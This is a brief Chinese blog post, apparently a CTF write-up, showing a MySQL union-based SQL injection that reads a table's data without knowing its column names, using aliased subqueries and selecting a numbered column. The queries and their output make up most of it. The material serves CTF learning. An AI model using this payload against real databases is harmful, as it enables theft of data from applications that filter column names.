过滤列名如何注入dump数据

这是一个非常神奇的东西,在做LCTF中大牛提及的DDCTF2017中的一个题目,废话不多少,直接放出来效果及其利用语句

mysql>  select * from (select 1)a,(select 2)b,(select 3)c;
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
1 row in set (0.14 sec)

mysql>  select * from (select 1)a,(select 2)b,(select 3)c union select * from flag;
+------+-------+------------------------+
| 1    | 2     | 3                      |
+------+-------+------------------------+
| 1    | 2     | 3                      |
| 1    | admin | flag{flag_is_here}     |
| 2    | guest | flag{flag_is_not_here} |
| 3    | fuzz  | flag{admin_is_not_me}  |
+------+-------+------------------------+
4 rows in set (0.00 sec)

mysql> select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from flag)e;
+------------------------+
| 3                      |
+------------------------+
| 3                      |
| flag{flag_is_here}     |
| flag{flag_is_not_here} |
| flag{admin_is_not_me}  |
+------------------------+
4 rows in set (0.00 sec)

我们就可以注意到,这个时候就巧妙的将列名给绕过了!我们只需要知道表名即可

是一个之前不知道的特性,具体请看LCTF中的题目吧。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值